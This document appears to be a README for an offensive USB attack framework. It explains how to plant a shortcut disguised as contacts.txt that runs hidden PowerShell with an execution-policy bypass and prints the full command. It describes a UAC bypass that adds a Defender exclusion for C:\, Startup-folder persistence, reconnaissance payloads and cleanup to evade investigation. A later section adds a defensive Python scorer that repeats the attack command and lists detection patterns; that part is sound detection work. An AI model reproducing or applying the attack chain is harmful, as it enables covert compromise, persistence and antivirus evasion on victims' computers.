An offensive security framework that weaponizes any standard USB Device
This framework is designed to be deployed from any standard USB drive.
This attack takes advantage of the ability to run PowerShell commands from inside a .lnk (shortcut) file.
The following video is another example of how this method may be implemented.
After downloading the .zip file and placing its contents on your USB drive, delete the ReadMe.md and LICENSE files.
Next, make sure the `h` directory and the `s1.bat` file have the hidden attribute set. You do not want these files to be visible to your target.
The root directory of the drive should now contain 3 items:
- A hidden `h` directory - a folder containing all the files to be moved onto your target's system, plus the initial script to be run
- A hidden `s1.bat` file - a batch file, called by the shortcut, that moves the files above into place and executes the initial script
- A `contacts.txt.lnk` file (shortcut) - a phishing shortcut disguised as a text file to entice your target to open it
The `h` directory contains 5 more files:
- `contacts.txt` - the actual text file opened by the shortcut, to convince your target they just opened a regular txt file
- `exception.ps1` - a script containing a UAC bypass that opens an admin window and adds the target's C:\ drive to the Windows Defender exclusion list, so that further tools you download are not flagged by Defender
- `intitial.ps1` - a script that runs once, when the target opens the fake text file
- `persist.cmd` - a file added to the Startup folder to achieve persistence; it calls the `persist.ps1` file stored in the AppData directory
- `persist.ps1` - the file that holds the script to be run every time the target boots their computer
Taking advantage of a little-known trick, we run PowerShell code embedded in a shortcut's Target field, as seen in the image below.
This has a few advantages:
- You can't run a regular PowerShell script by double-clicking it; that only opens it in the default text editor. It will run from a shortcut.
- External PowerShell scripts cannot be run without triggering the UAC prompt. The shortcut opens the target's own PowerShell console and we run from there, so the system treats it as a native script.
This is the code in the shortcut's Target field:
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoP -NonI -W H -ep bypass ".((gwmi win32_volume -f 'label=''259''').Name+'s1.bat')
This code opens a PowerShell console with the execution policy bypassed, looks up the drive letter of our USB drive by its volume label, and runs our batch file from it.
For the lookup to find the drive, the volume label of the USB drive must match the label used in the Target field code.
In this example, notice that the label in the image below and in the code above are both 259. The label can be changed, but the two must match.
Once you have all of the above set up, you are ready to execute this attack vector.
You will want to have 2 payloads ready:
- Your initial payload, run once when the attack is triggered. I use my ADV Recon payload to gather as much information on my target as possible.
- The payload to be run with persistence at each reboot of your target's PC (this payload will vary depending on your goal).
Once the attack is triggered by your target opening the fake text-file shortcut, it opens the real, hidden txt file from the `h` directory to avoid suspicion.
The shortcut then runs the `s1.bat` file, which kicks off the rest of your scripts.
First your initial payload runs, then your `persistance.bat` file is moved to the Startup directory.
Your `persistence.ps1` file is then added to the AppData folder, run once immediately, and run again at each start-up.
Finally, the real hidden text file replaces your fake txt shortcut and the remaining files are deleted, to avoid further investigation of your USB drive.
In a real-world scenario you would also want to make the USB drive look realistic, with a photo album or something similar, to entice your target to get in contact with you by opening the fake contacts.txt file.
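For defenders, the chain described above leaves a small set of host-telemetry indicators that this README itself spells out: a PowerShell process with a hidden window and `-ep bypass`, spawned from explorer.exe by a shortcut double-click, that resolves a drive by volume label via `win32_volume`; a file dropped into the Startup folder; and a Windows Defender exclusion being added. The following Python script is an added example written for this page (it is not part of the framework) that scores constructed, Sysmon-style process-create, file-create and registry events against those indicators. The event field names (`id`, `image`, `parent`, `cmdline`, `target`) and the weights are this example's own assumptions, not a real log schema.

```python
"""Score host events for the .lnk -> hidden PowerShell -> USB-by-label chain.

Added example for this page; the event layout below is an assumption,
loosely modelled on Sysmon Event ID 1 (process create), 11 (file create)
and 13 (registry value set).
"""
import re
from typing import Dict, List, Tuple

# Constructed sample telemetry (not captured from a real host).
SAMPLE_EVENTS: List[Dict[str, object]] = [
    {   # shortcut double-click: explorer.exe -> hidden PowerShell locating a volume by label
        "id": 1,
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "parent": r"C:\Windows\explorer.exe",
        "cmdline": "powershell.exe -NoP -NonI -W H -ep bypass "
                   "\".((gwmi win32_volume -f 'label=''259''').Name+'s1.bat')\"",
    },
    {   # batch file launching a script from a removable drive: no flagged flags on its own
        "id": 1,
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "parent": r"C:\Windows\System32\cmd.exe",
        "cmdline": r"powershell.exe -File E:\h\exception.ps1",
    },
    {   # persistence: a file written into the per-user Startup folder
        "id": 11,
        "image": r"C:\Windows\System32\cmd.exe",
        "target": r"C:\Users\alice\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\persist.cmd",
    },
    {   # benign admin script: -NoProfile alone should not trip the threshold
        "id": 1,
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "parent": r"C:\Windows\explorer.exe",
        "cmdline": r"powershell.exe -NoProfile -File C:\scripts\backup.ps1",
    },
    {   # Defender exclusion for the whole C:\ drive being registered
        "id": 13,
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "target": "HKLM\\SOFTWARE\\Microsoft\\Windows Defender\\Exclusions\\Paths\\C:\\",
    },
]

# Indicators taken from the command line shown on this page, accepting both
# the abbreviated and the long form of each PowerShell switch.
HIDDEN_WINDOW = re.compile(r"-w(?:indowstyle)?\s+h(?:idden)?\b", re.I)
EP_BYPASS = re.compile(r"-e(?:p|xec|xecutionpolicy)\s+bypass\b", re.I)
QUIET_FLAGS = re.compile(r"-(?:nop|noprofile|noni|noninteractive)\b", re.I)
VOLUME_BY_LABEL = re.compile(r"win32_volume.*label=", re.I)
STARTUP_FOLDER = re.compile(r"\\start menu\\programs\\startup\\", re.I)
DEFENDER_EXCLUSION = re.compile(r"\\windows defender\\exclusions\\", re.I)


def score_event(ev: Dict[str, object]) -> Tuple[int, List[str]]:
    """Return (score, reasons) for one event; weights are illustrative."""
    score, reasons = 0, []
    if ev.get("id") == 1:
        cmd = str(ev.get("cmdline", ""))
        for rx, weight, why in (
            (HIDDEN_WINDOW, 2, "hidden PowerShell window"),
            (EP_BYPASS, 2, "execution policy bypass"),
            (QUIET_FLAGS, 1, "-NoProfile / -NonInteractive"),
            (VOLUME_BY_LABEL, 3, "locates a drive by volume label"),
        ):
            if rx.search(cmd):
                score += weight
                reasons.append(why)
        # A hidden console started straight from explorer.exe is the
        # shortcut double-click pattern rather than an interactive session.
        parent = str(ev.get("parent", "")).lower()
        if parent.endswith("explorer.exe") and HIDDEN_WINDOW.search(cmd):
            score += 1
            reasons.append("spawned by explorer.exe with hidden window")
    elif ev.get("id") == 11:
        if STARTUP_FOLDER.search(str(ev.get("target", ""))):
            score += 3
            reasons.append("file written to Startup folder")
    elif ev.get("id") == 13:
        if DEFENDER_EXCLUSION.search(str(ev.get("target", ""))):
            score += 4
            reasons.append("Windows Defender exclusion added")
    return score, reasons


def scan(events: List[Dict[str, object]], threshold: int = 3) -> List[Dict[str, object]]:
    """Return every event at or above the threshold with its index, score and reasons."""
    findings = []
    for i, ev in enumerate(events):
        score, reasons = score_event(ev)
        if score >= threshold:
            findings.append({"index": i, "score": score, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(finding)
```

Run against the constructed events, the explorer-spawned hidden PowerShell (index 0), the Startup folder write (index 2) and the Defender exclusion (index 4) are reported; the `-NoProfile` backup script stays below the threshold. The volume-label lookup carries the highest process weight because, unlike `-ep bypass`, it has very little legitimate use in an interactive or scheduled context.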
- An internet connection
- Windows 10 or 11
All contributors' names will be listed here.
I am Jakoby
- 0.1
- Initial Release